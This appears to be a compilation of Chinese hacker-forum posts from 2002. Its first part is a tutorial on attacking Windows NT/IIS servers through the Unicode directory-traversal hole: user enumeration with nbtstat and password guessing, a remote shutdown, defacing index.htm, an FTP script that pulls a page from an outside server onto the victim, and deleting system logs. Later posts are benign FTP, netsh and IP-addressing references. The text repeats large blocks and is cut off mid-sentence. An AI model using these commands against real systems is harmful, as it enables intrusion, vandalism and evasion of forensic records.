    PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
    PROCESSOR_LEVEL=6
    PROCESSOR_REVISION=0303
    PROMPT=$P$G
    QUERY_STRING=/c+set
    REMOTE_ADDR=XX.XX.XX.XX
    REMOTE_HOST=XX.XX.XX.XX
    REQUEST_METHOD=GET
    SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
    SERVER_NAME=XX.XX.XX.XX
    SERVER_PORT=80
    SERVER_PORT_SECURE=0
    SERVER_PROTOCOL=HTTP/1.1
    SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
    SystemDrive=D:
    SystemRoot=D:/WINNT
    TZ=GMT-9
    USERPROFILE=D:/WINNT/Profiles/Default User
    windir=D:/WINNT

    粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。

    7:nbtstat

    如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!

    现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。

    命令是

    nbtstat -A XXX.XXX.XXX.XXX

    -A一定要大写哦。

    下面是得到的结果。

    NetBIOS Remote Machine Name Table

    Name Type Status
    ---------------------------------------------
    Registered Registered Registered Registered Registered Registered Registered Reg
    istered Registered Registered Registered
    MAC Address = 00-E0-29-14-35-BA
    PENTIUMII <00> UNIQUE
    PENTIUMII <20> UNIQUE
    ORAHOTOWN <00> GROUP
    ORAHOTOWN <1C> GROUP
    ORAHOTOWN <1B> UNIQUE
    PENTIUMII <03> UNIQUE
    INet~Services <1C> GROUP
    IS~PENTIUMII...<00> UNIQUE
    ORAHOTOWN <1E> GROUP
    ORAHOTOWN <1D> UNIQUE
    ..__MSBROWSE__.<01> GROUP


    粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。

    这里的用户是PENTIUMII。

    8:Shutdown

    关了对方的NT服务器的命令

    Shutdown //IP地址 t:20

    20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。

    9:DIR

    这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。

    你可以本地试下。

    10:echo

    著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。

    我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。

    echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm

    echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm

    第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。

    第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。

    “>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。

    大家可以本地试下。

    可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

    1、首先,我们需要申请一个免费的主页空间。

    2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
    open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
    cnhack(你申请时的用户名)
    test(你申请时的密码)
    get index.htm c:/inetpub/wwwroot/index.htm(这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
    bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

    具体的做法:
    输入 echo open upload.chinaren.com> c:/cnhack.txt
    输入 echo cnhack >> c:/cnhack.txt
    输入 echo 39abs >> c:/cnhack.txt
    输入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
    最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

    等命令完成时,文件已经下载到你指定的文件里了。

    注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

    记得要 del c:/cnhack.txt

    11:attrib

    这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

    attrib -r index.htm

    这个命令是把index.htm的只读属性去掉。

    如果把“-”改为“+”则是把这个文件的属性设置为只读

    ----------------------

    attrib +r index.htm

    这个命令是把index.htm的属性设置为只读。

    12:del

    当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。

    NT的日志有这些

    del C:/winnt/system32/logfiles/*.*
    del C:/winnt/ssytem32/config/*.evt
    del C:/winnt/system32/dtclog/*.*
    del C:/winnt/system32/*.log
    del C:/winnt/system32/*.txt
    del C:/winnt/*.txt
    del C:/winnt/*.log

    AHOTOWN <1B> UNIQUE
    PENTIUMII <03> UNIQUE
    INet~Services <1C> GROUP
    IS~PENTIUMII...<00> UNIQUE
    ORAHOTOWN <1E> GROUP
    ORAHOTOWN <1D> UNIQUE
    ..__MSBROWSE__.<01> GROUP


    粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。

    这里的用户是PENTIUMII。

    8:Shutdown

    关了对方的NT服务器的命令

    Shutdown //IP地址 t:20

    20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。

    9:DIR

    这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。

    你可以本地试下。

    10:echo

    著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。

    我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。

    echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm

    echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm

    第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。

    第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。

    “>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。

    大家可以本地试下。

    可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

    1、首先,我们需要申请一个免费的主页空间。

    2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
    open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
    cnhack(你申请时的用户名)
    test(你申请时的密码)
    get index.htm c:/inetpub/wwwroot/index.htm(这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
    bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

    具体的做法:
    输入 echo open upload.chinaren.com> c:/cnhack.txt
    输入 echo cnhack >> c:/cnhack.txt
    输入 echo 39abs >> c:/cnhack.txt
    输入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
    最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

    等命令完成时,文件已经下载到你指定的文件里了。

    注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

    记得要 del c:/cnhack.txt

    11:attrib

    这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

    attrib -r index.htm

    这个命令是把index.htm的只读属性去掉。

    如果把“-”改为“+”则是把这个文件的属性设置为只读

    ----------------------

    attrib +r index.htm

    这个命令是把index.htm的属性设置为只读。

    12:del

    当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    FTP命令大全及其应用
    FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX操作系统下 使用FTP,都会遇到大量的FTP内部命令,熟悉并灵活应用FTP的内部命令,可以大大方便 使用者,对于现在拨号上网的用户,如果ISP提供了shell可以使用nohup,那么ftp将是 你最省钱的上download方式,ftp的命令行格式为:ftp -v -d -i -n -g[主机名]   -v 显示远程服务器的所有响应信息。
      -d 使用调试方式。
       -n 限制ftp的自动登录,即不使用.netrc文件。
       -g 取消全局文件名。
      ftp使用的内部命令如下(其中括号表示可选项):   1.![cmd[args]]在本地机中执行交互shell、exit回到ftp环境,如!ls*.zip。
      2.¥ macro-ame[args]执行宏定义macro-name。
      3.account[password]提供登录远程系统成功后访问系统资源所需的补充口令。
      4.appendlocal-file[remote-file]将本地文件追加到远程系统主机,若未指定

    远程系统文件名,则使用本地文件名。
      5.ascii 使用ascii类型传输方式。
      6.bell每个命令执行完毕后计算机响铃一次。
      7.bin使用二进制文件传输方式。
      8.bye退出ftp会话过程。
      9.case在使用mget时,将远程主机文件名中的大写转为小写字母。
      10.cd remote-dir 进入远程主机目录。
      11.cdup进入远程主机目录的父目录。
      12.chmod modefile-name将远程主机文件file-name的存取方式设置为mode,如

    chmod 777 a.out。
      13.close中断与远程服务器的ftp会话(与open对应)。
      14.cr使用asscii方式传输文件时,将回车换行转换为回行。
      15.delete remote-file删除远程主机文件。
      16.debug[debug-value]设置调试方式,显示发送至远程主机的每条命令,如debu p
    3,若 设为0,表示取消debug。
      17.dir[remote-dir][local-file]显示远程主机目录,并将结果存入local-
    file。
      18.disconnection同close。
      19.form format将文件传输方式设置为format,缺省为file方式。
      20.getremote-file[local-file]将远程主机的文件remote-file传至本地硬盘的local-file。
      21.glob设置mdelete、mget、mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
      22.hash每传输1024字节,显示一个hash符号(#)。
      23.help[cmd]显示ftp内部命令cmd的帮助信息,如help get。
      24.idle[seconds]将远程服务器的休眠计时器设为[seconds]秒。
       25.image设置二进制传输方式(同binary)
       26.lcd[dir]将本地工作目录切换至dir。
       27.ls[remote-dir][local-file]显示远程目录remote-dir,并存入本地loca l
    -file。
       28.macdef macro-name定义一个宏,遇到macdef下的空行时,宏定义结束。
       29.mdelete[remote-file]删除远程主机文件。
       30.mdir remote-files local-file与dir类似,但可指定多个远程文件,如mdi r
    *.o.*. zipoutfile。
       31.mget remote-files传输多个远程文件。
       32.mkdir dir-name 在远程主机中建一目录。
       33.mls remote-file local-file同nlist,但可指定多个文件名。
       34.mode[mode-name]将文件传输方式设置为mode-name,缺省为stream方式。

       35.modtime file-name显示远程主机文件的最后修改时间。
       36.mput local-file将多个文件传输至远程主机。
       37.newerfile-name如果远程机中file-name的修改时间比本地硬盘同名文件的

    时间更近,则重传该文件。
       38.nlist[remote-dir][local-file]显示远程主机目录的文件清单,并存入本地硬盘的local-file。
       39.nmap[inpatternoutpattern]设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如nmap¥1.¥2.¥3[¥1,¥2].[¥2,¥3],则传输文件a1.a2.a3时 ,文件名变为a1、a2,该命令特别适用于远程主机为非U-NIX机的情况。
       40.ntrans[inchars[outchars]]设置文件名字符的翻译机制,如ntrans1R,则文件

    名LL L将变为RRR。
       41.open host[port]建立指定ftp服务器连接,可指定连接端口。
       42.passive进入被动传输方式。
       43.prompt设置多个文件传输时的交互提示。
       44.proxyftp-cmd在次要控制连接中,执行一条ftp命令,该命令允许连接两个ft p
    服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务

    器间的连接。
       45.put local-file[remote-file]将本地文件local-file传送至远程主机。

       46.pwd显示远程主机的当前工作目录。
       47.quit同bye,退出ftp会话。
       48.quote arg1,arg2……将参数逐字发至远程ftp服务器,如quote syst。
       49.recv remote-file[local-file]同get。
       50.regetremote-file[local-file]类似于get,但若local-file存在,则从上

    次传输中断处续传。
       51.rhelp[cmd-name]请求获得远程主机的帮助。
       52.rstatus[file-name]若未指定文件名,则显示远程主机的状态,否则显示文件

    状态。
       53.rename[from][to]更改远程主机文件名。
       54.reset清除回答队列。
       55.restart marker从指定的标志marker处,重新开始get或put,如restart 130。


       56.rmdir dir-name删除远程主机目录。
       57.runique设置文件名唯一性存储,若文件存在,则在原文件后加后缀。
       58.send local-file[remote-file]同put。
       59.sendport设置PORT命令的使用。
       60.site arg1,arg2……将参数作为SITE命令逐字发送至远程ftp主机。
       61.size file-name显示远程主机文件大小,如site idle 7200。
       62.status显示当前ftp状态。
       63.struct[struct-name]将文件传输结构设置为struct-name,缺省时使用
    stream结构。
    64.sunique将远程主机文件名存储设置为唯一(与runique对应)。
       65.system显示远程主机的操作系统类型。
       66.tenex将文件传输类型设置为TENEX机所需的类型。
       67.tick设置传输时的字节计数器。
       68.trace设置包跟踪。
       69.type[type-name]设置文件传输类型为type-name,缺省为ascii,如
    typebinary,设置 二进制传输方式。
       70.umask[newmask]将远程服务器的缺省umask设置为newmask,如umask 3。
       71.useruser-name[password][account]向远程主机表明自己的身份,需要口令

    时,必须输入口令,如user anonymous my@email
       72.verbose同命令行的-v参数,即设置详尽报告方式,ftp服务器的所有响应都将

    显示给用户,缺省为on.
       73.?[cmd]同help。
      那么如何应用这些命令提高效率呢?下面我举一个例子,如何利用fttp进行后台

    下载,假设你的ISP给你提供了shell并且可以用nohup,你想由
    fttp.download.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下:
      1.用notepad做一个文件如aaa1内容如下
       open ftp.dwonload.com
       user anonymous zyz@cenpok.net
       cd /pub/internet/
       i
       get aaa.zip
       close
       bye
       2.拨号登录到你的ISP上。用telnet 或netterm登录到shell,一般都在你的hom e
    子目录里bbs~/
       3.用fttp上传aaa1到ISP服务器你的子目录。
        4. 执行nohup fttp -invd aaa2&
      这样这个进程就被放在ISP服务器的后台进行了,如果你想知道情况如何,可以
    more aaa2就可以知道情况如何了。这时你可以断线了或干点别的,估计时间到了
    (time约=30M/(33.6K/9)s)拨号上去,more aaa2如果显示成功下载aaa.zip就表示
    aaa.zip已经被下载到ISP的服务器上了,你再由ISP的服务器拉回来就相当与点对点
    了,记得下载完成后del掉你的文件(aaa.zip),免得浪费ISP资源,它会关掉shell的。


    件传输时的交互提示。
       44.proxyftp-cmd在次要控制连接中,执行一条ftp命令,该命令允许连接两个ft p
    服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务

    器间的连接。
       45.put local-file[remote-file]将本地文件local-file传送至远程主机。

       46.pwd显示远程主机的当前工作目录。
       47.quit同bye,退出ftp会话。
       48.quote arg1,arg2……将参数逐字发至远程ftp服务器,如quote syst。
       49.recv remote-file[local-file]同get。
       50.regetremote-file[local-file]类似于get,但若local-file存在,则从上

    次传输中断处续传。
       51.rhelp[cmd-name]请求获得远程主机的帮助。
       52.rstatus[file-name]若未指定文件名,则显示远程主机的状态,否则显示文件

    状态。
       53.rename[from][to]更改远程主机文件名。
       54.reset清除回答队列。
       55.restart marker从指定的标志marker处,重新开始get或put,如restart 130。


       56.rmdir dir-name删除远程主机目录。
       57.runique设置文件名唯一性存储,若文件存在,则在原文件后加后缀。
       58.send local-file[remote-file]同put。
       59.sendport设置PORT命令的使用。
       60.site arg1,arg2……将参数作为SITE命令逐字发送至远程ftp主机。
       61.size file-name显示远程主机文件大小,如site idle 7200。
       62.status显示当前ftp状态。
       63.struct[struct-name]将文件传输结构设置为struct-name,缺省时使用
    stream结构。
    64.sunique将远程主机文件名存储设置为唯一(与runique对应)。
       65.system显示远程主机的操作系统类型。
       66.tenex将文件传输类型设置为TENEX机所需的类型。
       67.tick设置传输时的字节计数器。
       68.trace设置包跟踪。
       69.type[type-name]设置文件传输类型为type-name,缺省为ascii,如
    typebinary,设置 二进制传输方式。
       70.umask[newmask]将远程服务器的缺省umask设置为newmask,如umask 3。
       71.useruser-name[password][account]向远程主机表明自己的身份,需要口令

    时,必须输入口令,如user anonymous my@email
       72.verbose同命令行的-v参数,即设置详尽报告方式,ftp服务器的所有响应都将

    显示给用户,缺省为on.
       73.?[cmd]同help。
      那么如何应用这些命令提高效率呢?下面我举一个例子,如何利用fttp进行后台

    下载,假设你的ISP给你提供了shell并且可以用nohup,你想由
    fttp.download.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下:
      1.用notepad做一个文件如aaa1内容如下
       open ftp.dwonload.com
       user anonymous zyz@cenpok.net
       cd /pub/internet/
       i
       get aaa.zip
       close
       bye
       2.拨号登录到你的ISP上。用telnet 或netterm登录到shell,一般都在你的hom e
    子目录里bbs~/

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    微软的Windows家族从Windows NT开始跨入了网络操作系统的市场,到现在的Windows 2000可以说网络功能在逐渐的完善,在这个成长过程中Windows融入了很多其他网络操作系统的功能,可以说是借鉴而来的,逐渐形成了一套功能完善的网络操作系统,这也是令SUN等各大公司所感觉到不服的原因,觉得不是微软完全自给研发的东西。不过Windows2000的功能确实是很强大的,它几乎可以象Unix和Linux一样在命令行下做很多的工作。
    下面我们看一下Windows上一个可以在命令行下更改ip地址的命令,看过这个命令后大家可能会觉得这个命令很象Unix和Linux的命令,更象Cisco的路由器命令。下面是我在计算机上实际操作的回显,我会加上一些注释:
    C:/>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)

    Windows 2000 IP Configuration

    Ethernet adapter 本地连接:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.0.250 (本地连接更改之前的ip)
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.0.1

    PPP adapter 拨号连接:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 211.149.128.147
    Subnet Mask . . . . . . . . . . . : 255.255.255.255
    Default Gateway . . . . . . . . . : 211.149.128.147

    C:/>netsh (然后执行netsh这个命令)
    netsh>interface (netsh命令的子命令)
    interface>ip (interface命令的子命令)
    interface ip>set (interface ip命令的子命令)

    下列指令有效:

    此上下文中的命令:
    set address - 设置指定的接口的 IP 地址或默认网关。
    set dns - 设置 DNS 服务器模式和地址。
    set wins - 设置 WINS 服务器模式和地址。
    interface ip>set address "本地连接" static 192.168.0.2 255.255.255.0 192.168.0.1
    1 (设置ip地址)
    确定。

    (注释:上面一段象不象Cisco的命令。)

    interface ip>exit


    C:/>ipconfig (更改后再用ipconfig命令看一下ip地址,确认一下是否更改成功)

    Windows 2000 IP Configuration

    Ethernet adapter 本地连接:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.0.2 (更改后的ip说明成功了)
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.0.1

    PPP adapter 拨号连接:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 211.149.128.147
    Subnet Mask . . . . . . . . . . . : 255.255.255.255
    Default Gateway . . . . . . . . . : 211.149.128.147

    C:/>

    netsh这个命令还有好多强大的功能 如下:

    C:/>netsh
    netsh>?

    下列指令有效:

    此上下文中的命令:
    .. - 移到上一层上下文级。
    ? - 显示命令列表。
    aaaa - 更改到 `aaaa'' 上下文。
    abort - 丢弃在脱机模式下所做的更改。
    add - 将一个配置项添加到项目列表中。
    alias - 添加一个别名
    bye - 退出程序。
    commit - 提交在脱机模式中所做的更改。
    delete - 在项目列表上删除一个配置项目。
    dhcp - 更改到 `dhcp'' 上下文。
    dump - 显示一个配置脚本。
    exec - 运行一个脚本文件。
    exit - 退出程序。
    help - 显示命令列表。
    interface - 更改到 `interface'' 上下文。
    offline - 将当前模式设置成脱机。
    online - 将当前模式设置成联机。
    popd - 从堆栈上打开一个上下文。
    pushd - 将当前上下文放推入堆栈。
    quit - 退出程序。
    ras - 更改到 `ras'' 上下文。
    routing - 更改到 `routing'' 上下文。
    set - 更新配置设置。
    show - 显示信息
    unalias - 删除一个别名。
    wins - 更改到 `wins'' 上下文。

    下列的子上下文可用:
    routing interface ras dhcp wins aaaa

    若需要命令的更多帮助信息,请键入命令,
    后面跟 ?。

    . . : 192.168.0.250 (本地连接更改之前的ip)
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.0.1

    PPP adapter 拨号连接:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 211.149.128.147
    Subnet Mask . . . . . . . . . . . : 255.255.255.255
    Default Gateway . . . . . . . . . : 211.149.128.147

    C:/>netsh (然后执行netsh这个命令)
    netsh>interface (netsh命令的子命令)
    interface>ip (interface命令的子命令)
    interface ip>set (interface ip命令的子命令)

    下列指令有效:

    此上下文中的命令:
    set address - 设置指定的接口的 IP 地址或默认网关。
    set dns - 设置 DNS 服务器模式和地址。
    set wins - 设置 WINS 服务器模式和地址。
    interface ip>set address "本地连接" static 192.168.0.2 255.255.255.0 192.168.0.1
    1 (设置ip地址)
    确定。

    (注释:上面一段象不象Cisco的命令。)

    interface ip>exit


    C:/>ipconfig (更改后再用ipconfig命令看一下ip地址,确认一下是否更改成功)

    Windows 2000 IP Configuration

    Ethernet adapter 本地连接:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.0.2 (更改后的ip说明成功了)
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.0.1

    PPP adapter 拨号连接:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 211.149.128.147
    Subnet Mask . . . . . . . . . . . : 255.255.255.255
    Default Gateway . . . . . . . . . : 211.149.128.147

    C:/>

    netsh这个命令还有好多强大的功能 如下:

    C:/>netsh
    netsh>?

    下列指令有效:

    此上下文中的命令:
    .. - 移到上一层上下文级。
    ? - 显示命令列表。
    aaaa - 更改到 `aaaa'' 上下文。
    abort - 丢弃在脱机模式下所做的更改。
    add - 将一个配置项添加到项目列表中。
    alias - 添加一个别名
    bye - 退出程序。
    comm

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    ●关于IP地址
    在Internet中,每一台主机都有一个唯一的地址,网关常常有不止一个的地址。地址由两部
    分组成:网络号和主机号。这种组合是唯一的,以使每一个IP地址表示Internet中的唯一一
    台主机。所有的IP地址都是32位长。
    IP地址分为五类,平常我们使用的是A类、B类、C类三类地址,它们的表现格式如下:
    地址类型 地址形式
    A N.H.H.H
    B N.N.H.H
    C N.N.N.H

    其中N指的是网络号,H指的的是主机号。N和H都是大于0小于256的整数。由于A类地址的第一
    字节的最高为0,用来表示地址为A类地址,因此A类地址只可以表示1~126个网络,而每个网络
    有16,000,000台主机。0和127则有特殊的用处。
    B类和C类地址的第一字节的最高两位用于表示地址是B或者C类地址,因此B类地址第一字节的范
    围为128~191,C类为192~222。所以B类地址共可以表示64X256(16,382)个网络,每个网络有
    64,000台主机。C类有两百多万个网络,而每个网络最多有254台主机。
    关于D类地址则称为多路广播地址,即将主机分组,发往一多多路广播地址的信包,同组的主机
    都可以收到。
    在我们国内,IP地址是由科学院网络中心及其授权的机构来进行分配的。


    ●何谓“子网”

    如果说一个网络里有很多的主机的话,会给管理带来很多困难,并且使网络的设置复杂而容易
    出错。在许多情况下,一个A或B类地址的一个网络号,它所对应了如此之多的主机,以至于一
    组织或单位常常用不了。另一方面,C类地址一个网络只有254个主机号又显得太少。与是在实际中常常将一个较大的网络
    分成几个部分,每个部分称为一个——子网。在外部,这几个子网依然对应一个完整的网络号。划分的办法是
    将地址的主机号部分近一步划分成子网号和主机号两个部分。

    比如,159.226.xxx.xxx 是一个B类地址。
    159.226.21.xxx地址的范围是中科院自动化所,159.226.40.xxx是中国计算所,159.226.41.xxx是国家智能中心。可以看的
    出来,这一个B类的地址的第三个字节的一部分变成了子网号了,最后的一个字节才用来表示不同的主机。当然了,这只是一个
    例子。有的单位还可能进行近一步的划分,将整个第三个字节和第四个字节的最高几位也作为子网号部分,于是每个子网内最多
    只能有64台主机。至于怎么样去观察自己的子网形成,win9x的用户可以运行winipcfg来看了。

    ●如何认识网络掩码

    当在Internet里两台机器通信的时候,需要比较两台主机IP地址,用来判断这两台主机间是否在同一子网内,如果是,那么数据包
    就可以直接发给那台主机了,如果不是,那么就得发向网关所在的主机了。这可以通过设置正确的网络掩码来解决。网络掩码就是
    对应于网络号和子网号为二进制1,主机号部分为0的串。可以通过ifconfig命令来看一下自己所在的网络号、网络掩码等情况。你可
    以从下面这个例子来看:
    $ ifconfig -a
    loO: flags=849[UP,LOOPBACK,RUNNING,MULTICAST] mtu 8232
    inet 127.0.0.1 netmask ffOOOOOO
    leO: flags-863[UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST] mtu 1500
    inet 159.226.21.7 ffffffcO broadcast 159.226.21.191
    这样就可以看出来,和leO相结合的是一个B类地址,它的IP地址为159.226.21.7,这个B类地址的网络掩码是ffffffcO,也就是第三字
    节以及第四字节的最高两个位做了子网号。
    有一些IP地址的形式是保留的:
    ◇IP地址是0.0.0.0,在主机引导时使用,其后不再用。
    ◇网络号为0的IP地址指同一个网络内的主机。
    ◇使用正确的网络号,而主机号部分是全l,用于向Internet中具有 该网络号的网络上的所有主机广播。
    ◇主机号部分是全l的IP地址用于本网段内广播。
    ◇发向127.0.0.1的地址的数据包,被立刻放到本机的输入队列里,常常用于调试网络软件。

    现在您认识了何谓网络掩码了吗?~*~

    ●怎么理解冒充IP!

    我想你在网络之中畅游的时候经常会碰到或听到一些关于盗用IP地址的做攻击之类的事情,那么到底怎么理解IP被“盗”呢?
    往往有时候是因为因为IP不够用,或者不法者为了冒充另外的主机去做攻击别人的事,以便起到隐藏自己的作用(我想后者占的比
    重比较大些),才去做盗用IP的事情。
    其实要冒充不再同一网段的一台主机的IP,你可以使用RAW SOCKET发出IP包,当然了,条件是你必须先拥有超级用户的权限,
    但这种形式一般接收不到回应的信息,原因是网关不会将这些数据包转进这个网段内的。这样想想而比较之下,要去冒充与自
    己同网段的主机IP就比较简单和方便了。如果你是Windows用户的话改一改IP地址和掩码就可以搞定了,但是UNIX就相对来说就
    稍微麻烦一点了,需要编程才可以玩这些(如果成功的话,则可以伪造很多使用IP协议的数据包,从而很大程度的扰乱了网络
    的秩序)。
    冒充IP所带来的效果则是两台机器同时使用同一个IP,当两方都开着机器的话,系统就会报告IP有冲突了。一般情况下是谁先开
    机谁就可以继续使用这个IP。不过要是Windows和UNIX之间“争”的话,那么Windows则必败无疑,哪怕是Windows先开机……

    那么如何实现IP冒充呢?其实这个问题在很多站点你都可以找到资料的。这里就不便做进一步解释了。


    ●IP欺骗攻击的概述!

    一个入侵者为了获得访问远程机器的权限,一般都会创建有欺骗性源IP地址的数据包。他们所用这种方法是利用了使用基于IP地
    址的认证应用的特点,并可能导致获取非授权访问的权限,甚至对目标机器系统的root访问权限。这种攻击方法即便是在返回包
    不能到达入侵者的情况先也可以得逞。
    当然了,不是说任何情况下都可以这样做的,主要是看目标机器的配置是否可以如此。比如说:A、支持多内部接口到外部网络的
    路由器;B、在内部网络支持子网并有两个网络接口的路由器;C、其代理程序使用源IP地址认证系统的Firewall。这三点说明了
    有可能遭受该这种方法攻击的配置情况。
    如果说为了方便Internet用户而开设Telnet的话,那么有些服务也是如此,有它好的一面,也有它不安全的一面。IP欺骗攻击在
    A、SunRPC & NFS;B、X Windows;C、BSD UNIX“r”命令等如此服务下是较容易受到攻击的。
    至于如何检查是否受到此类IP欺骗,方法很多,这里例举一种:查看者可以比较内部网络不同系统间的进程帐号日志,一旦系统受
    到了此类攻击的话,就可以在受攻击的系统上得到一个日志项,里面显示对应的远程访问。而在源机器上将没有对应的初始化该远
    程访问的记录项(注意:一般入侵者也知晓如何修改此日志项)。
    解决IP欺骗的最好方法就是安装过滤路由器,不允许包含内部网络地址的数据包通过该路由器。此外在发出数据包中应该过滤掉源
    地址与内部网络地址不同的数据包,这样可以就防止源内部网络的IP欺骗攻击。当然了,什么都不是万能的,不可完全依赖于如此。

    ●IP层的其它协议!
    无论是喜欢网络或者是关注网络安全,那么了解一下IP层的其它协议将是必不可少的。

    ICMP(Internet Control Message Protocol,为控制信息协议)是用来传送一些关于网络和主机的控制信息的,如目标主机是不是
    可以到达的、路由的重定向、目标主机是否在使用等。常用的"ping"命令就是使用了ICMP协议。Echo Request是ping发向目标主机
    的,而Echo reply是由接收的主机发向目标主机的。很多网络攻击工具就是利用了这个协议来实现的。

    ARP(Address Resolution Protocol,为地址解析协议)是用来将IP地址映射成相应的主机MAC地址的。在局域网里两台主机通信的
    时候,通常需要知道目标主机的物理地址。执行命令arp就可以看到IP地址和物理地址的一些对应关系。

    RARP(Reverse Address Resolution Protocol,为反向地址解析协议)是用来将物理地址映射成32位的IP地址。这个协议大多用于
    无盘工作站启动时,因为无盘工作站只知道自己的物理地址,还需要利用rarp协议来获得一个IP地址。

    ●Telnet(远程登录)
    Telnet是一种Internet远程终端访问标准。它真实地模仿了远程终端,但是不具备有图形的作用,仅仅是字符界面的访问。Telnet
    允许为任何站点上的合法用户提供远程访问权,且不用做特殊的约定。
    Telnet并不是一个安全的服务,由于Telnet发送信息的时候都未加密,所以信息很容易被网络监听。仅仅当远程机器及其与本地站点
    之间的网络通信安全时,telnet才是相对的安全。这就说明在Internet中Telnet服务是不安全的。现在有一种安全的登陆客户程序,
    然而这种程序应用并不多,主要是因为应用这种程序的时候在服务器端要有相应的服务器程序。
    除了Telnet之外还有如rlogin、rsh、on等集中程序也可用于远程终端访问和执行程序。在受托的环境中使用这些程序,允许用户远程
    登陆而无需再重新输入口令。也就是说远程主机相信登陆的用户所用的主机以对其用户名与密码做过了认证。但是使用这几个r命令是
